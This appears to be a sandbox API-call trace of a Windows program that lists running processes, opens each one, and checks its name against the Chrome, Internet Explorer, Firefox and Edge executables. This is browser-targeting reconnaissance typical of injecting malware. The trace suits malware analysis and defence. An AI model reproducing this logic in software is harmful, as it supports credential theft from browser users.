	[0200.758] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0200.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1d24
	[0200.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.759] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0200.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.760] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.760] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0200.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.760] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.760] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1d28
	[0200.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.761] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.762] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.762] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.762] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.762] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0200.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1d2c
	[0200.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.763] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0200.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.764] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.764] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0200.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.765] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.765] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0200.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1d30
	[0200.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.766] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0200.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.766] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.767] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0200.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.767] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.767] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0200.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1d34
	[0200.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.768] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0200.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.768] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.769] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0200.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.769] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.769] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0200.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1d38
	[0200.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.770] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.770] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.770] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.771] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.771] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1d3c
	[0200.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.772] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.772] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.773] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.773] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.773] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1d40
	[0200.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.774] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.774] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.775] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.775] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.775] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1d44
	[0200.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.776] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.776] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.777] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.777] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.777] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1d48
	[0200.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.778] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.778] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1d4c
	[0200.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.780] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.780] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.781] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.781] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.781] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1d50
	[0200.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.782] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.782] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.782] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.783] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.783] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1d54
	[0200.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.784] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.784] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.784] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.785] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0200.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1d58
	[0200.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0200.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0200.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.787] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1d5c
	[0200.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.788] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.788] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.789] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.789] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0200.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1d60
	[0200.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.790] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.790] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.791] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.793] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.793] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1d64
	[0200.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.794] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.794] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.794] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.795] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1d68
	[0200.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.796] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.796] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.796] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.797] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.797] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0200.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1d6c
	[0200.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.798] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0200.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.798] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.798] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0200.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.799] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.799] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0200.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1d70
	[0200.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.800] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0200.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.800] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.801] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0200.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.801] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0200.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1d74
	[0200.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.802] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.802] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.802] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.803] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0200.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1d78
	[0200.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.804] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0200.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.804] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.805] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0200.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.805] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0200.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0200.806] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0200.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1d7c
	[0200.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.807] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0200.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.808] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.808] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0200.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.809] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.809] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0200.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1d80
	[0200.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.810] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0200.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.810] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.811] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0200.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.811] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.811] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0200.812] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1d84
	[0200.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.812] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
